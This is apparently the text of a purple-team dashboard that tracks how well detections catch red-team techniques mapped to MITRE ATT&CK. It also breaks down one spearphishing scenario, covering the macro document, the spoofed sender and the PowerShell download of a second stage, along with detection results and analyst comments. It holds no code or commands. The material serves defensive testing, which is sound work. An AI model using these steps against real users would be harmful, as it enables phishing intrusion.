ARENA | Powered by Semestra

Attack Validation

Validate Red Team attacks against Blue Team detection capabilities

Validation Success Rates

87

Total Validations

64

Validated (74%)

15

Failed (17%)

8

Pending (9%)

Initial Access

85%

Execution

72%

Persistence

68%

Privilege Esc.

79%

Lateral Move.

61%

Validation Scenarios

MITRE ATT&CK Technique

T1566.001

Spearphishing Attachment

VALIDATED

Initial Access • Validated 2h ago

T1059.001

PowerShell Execution

VALIDATED

Execution • Validated 5h ago

T1547.001

Registry Run Keys

FAILED

Persistence • Failed 1d ago

T1548.002

Bypass UAC

VALIDATED

Privilege Escalation • Validated 2d ago

T1003.001

LSASS Memory Dump

PENDING

Credential Access • Running...

T1021.001

Remote Desktop Protocol

VALIDATED

Lateral Movement • Validated 3d ago

T1055.001

Process Injection - DLL

FAILED

Defense Evasion • Failed 4d ago

T1087.001

Local Account Discovery

VALIDATED

Discovery • Validated 5d ago

Validation Details

T1566.001 - Spearphishing Attachment

Initial Access

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.

Email Malware Social Engineering

Attack Steps (Red Team)

1 Crafted malicious document

Created Excel file with embedded macro (invoice.xlsm)

2 Sent phishing email

Sent to target@semestra.local with spoofed sender address

3 Victim opened attachment

User opened document and enabled macros

4 Payload executed

Macro executed PowerShell to download second-stage payload

Detection Points (Blue Team)

Email Gateway Detection

Should detect suspicious attachment and sender anomaly

Endpoint AV/EDR

Should detect malicious macro and block execution

PowerShell Logging

Should log suspicious PowerShell activity

Network Monitoring

Should detect outbound connection to C2 server

Validation Results

Was attack detected?

Yes - Attack Detected

EDR detected malicious macro execution and blocked payload download. Email gateway flagged as suspicious but allowed delivery.

Detection Latency

2.4s

From execution to alert

False Positive Rate

0.8%

Very low FP rate

Coverage Score

75%

3 of 4 detection points

Detection Breakdown

Email Gateway: Partial detection (flagged but allowed)
Endpoint EDR: Detected and blocked macro execution
PowerShell Logging: Captured malicious activity
Network Monitoring: No alert (payload blocked before connection)

Notes & Comments

Purple Team Lead 2 hours ago

Email gateway needs tuning to block rather than just flag. Consider implementing stricter macro policies.

Blue Team Analyst 1 hour ago

Agreed. Will update email security rules to quarantine Office files with macros from external senders.